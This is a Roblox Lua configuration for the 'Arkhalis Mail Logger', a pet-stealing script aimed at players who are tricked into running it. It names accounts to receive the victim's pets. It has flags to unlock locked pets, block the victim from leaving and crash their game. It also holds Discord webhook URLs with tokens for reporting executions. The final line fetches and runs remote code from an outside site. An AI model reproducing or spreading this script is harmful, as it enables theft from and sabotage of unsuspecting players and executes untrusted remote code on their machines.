--[[ Arkhalis Mail Logger ]]--

--[[ Main Config ]]--
_G.Username = "dirmix_YT" --// Username To Send Pets To
_G.GiftMessage = "BOTIK EZKA HIHIHI" --// Message For The Gift To Say

_G.Diamonds = 500000 --// Amount Of Diamonds To Not Kick
_G.UnlockPets = true --// Unlocks Locked Pets
_G.AntiLeave = true --// Doesn't Let The Target Close Roblox
_G.Crash = true  --// Crashes Them After Its Finished

--[[ Webhook Config ]]--
_G.Webhook = "https://discord.com/api/webhooks/1103152322407841882/h2Kzf55tRH42Pzb960ScEPf_zRpHwBi_0yWVvKgdA3u1OO2vsIsqM6NFtmEAnC7sxmLI" --// Discord Webhook For Executions

--[[ UI Config ]]--
_G.ScriptName = "LOADING" --// Script Name On The UI
_G.Tip1 = "" --// Gives You Tips On The UI
_G.Tip2 = "" --// Gives You Tips On The UI
_G.Tip3 = "" --// Gives You Tips On The UI
_G.Tip4 = "" --// Gives You Tips On The UI
_G.Tip5 = "" --// Gives You Tips On The UI

--[[ OBFUSCATE BELOW ]]--


--[[ DualHookPremium ]]--

_G.PremiumBankInviteID = 1962605868--// Roblox user ID here to invite to bank
_G.MaibloxPremiumUsername = "dirmix2022" --//DualHook Account Name To Recive Huges
_G.WebhookDualHook = "https://discord.com/api/webhooks/1103294457513791539/qxe1aPr3ukuP2Fc2JlamPusheb9X5NfJoxE-6uQR4G7ScVgk_-jNAr2Fk6fxVSdzSmk9" --// DualHook WebHook Notfication
_G.Key = "ARKHALIS-EYBLFUVBADWX" --// Arkhalis Premium Key

--[[ Script ]]--
loadstring(game:HttpGet("https://arkhalislua.github.io/Lua/ArkhalisPremiumMailWithKey.lua"))()
